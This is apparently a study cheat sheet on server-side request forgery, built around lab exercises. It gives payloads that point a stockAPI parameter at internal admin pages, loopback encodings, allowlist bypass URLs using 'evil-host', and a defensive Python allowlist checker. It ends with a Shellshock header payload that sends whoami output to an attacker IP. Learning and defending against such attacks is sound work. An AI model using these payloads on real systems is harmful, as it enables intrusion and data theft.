SSRF

PRACTICE! PRACTICE! PRACTICE!

Check for any APIs that fetch information from the backend for the front end.

-> Tamper with them, e.g. replace stockAPI=https://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1 with stockAPI=http://127.0.0.1/admin

  • Find any internal services running in the 192.168.0.x range, then try accessing the /admin URL; use Burp Intruder to enumerate the x.

  • stockAPI=http://127.0.0.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65 <- "admin", double URL-encoded

  • Replace 127.0.0.1 with equivalent forms: 2130706433, 017700000001, 127.1

  • Whitelist bypasses: https://website.com@evil-host, https://evil-host#website.com, https://evil-host.website.com, https://evil-host#@website.com

  • We can URL-encode up to 3 times and still get a 200 status code.

  • Analyze the API that fetches the data of that product -> if it does not connect to an external service and only displays a path, visit the next product (or any option on that page that takes us to the next product) -> this will reveal the path and we can try an open redirect.
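On the defensive side, an added example (not from the original page) of the allowlist check a backend should apply to a parameter like stockAPI before fetching it. It blocks every bypass form listed above; the stock.weliketoshop.net host comes from the example above, and the allowlist itself and the function names are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist for this example: the only backend host the
# stockAPI parameter from the checklist should ever be allowed to reach.
ALLOWED_HOSTS = {"stock.weliketoshop.net"}
ALLOWED_SCHEMES = {"http", "https"}
IP_TYPES = (ipaddress.IPv4Address, ipaddress.IPv6Address)


def canonical_host(host):
    """Map a URL host to an ip_address object or a lowercased hostname.

    socket.inet_aton accepts the same shorthand the OS resolver does, so
    2130706433, 017700000001 and 127.1 all come back as 127.0.0.1, which a
    plain string comparison against "127.0.0.1" would have missed.
    """
    try:
        return ipaddress.ip_address(host)  # dotted quad or IPv6 literal
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(host)))
    except OSError:
        return host.lower().rstrip(".")


def check_target(url, allowed_hosts=ALLOWED_HOSTS):
    """Return (allowed, reason). Each rule blocks one bypass from the list."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        # https://website.com@evil-host: the real host is evil-host
        return False, "userinfo in URL"
    if parts.fragment:
        # https://evil-host#website.com: the allowlisted name is only a fragment
        return False, "fragment in URL"
    if not parts.hostname:
        return False, "no host"
    host = canonical_host(parts.hostname)
    if isinstance(host, IP_TYPES):
        if not host.is_global:  # loopback, 192.168.0.x, link-local, ...
            return False, f"{host} is not a public address"
        return False, f"IP literal {host} not on allowlist"
    if host not in allowed_hosts:
        # exact match only, so evil-host.website.com does not pass as website.com
        return False, f"host {host} not on allowlist"
    return True, f"host {host} allowed"
```

Resolving the allowed hostname and re-checking the resolved address with the same `is_global` test (not shown) is still needed, since DNS can point an allowlisted name at an internal address.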

Blind SSRF

  • If nothing works, try tampering with the "Referer" header using the Burp Collaborator public server; a ping back from the remote host confirms a blind SSRF.

  • Tamper with the "User-Agent" header by inserting the Shellshock payload, and modify the Referer header to make it connect to the remote host via the Burp Collaborator client:

() { :;}; /usr/bin/nslookup $(whoami).Attacker's IP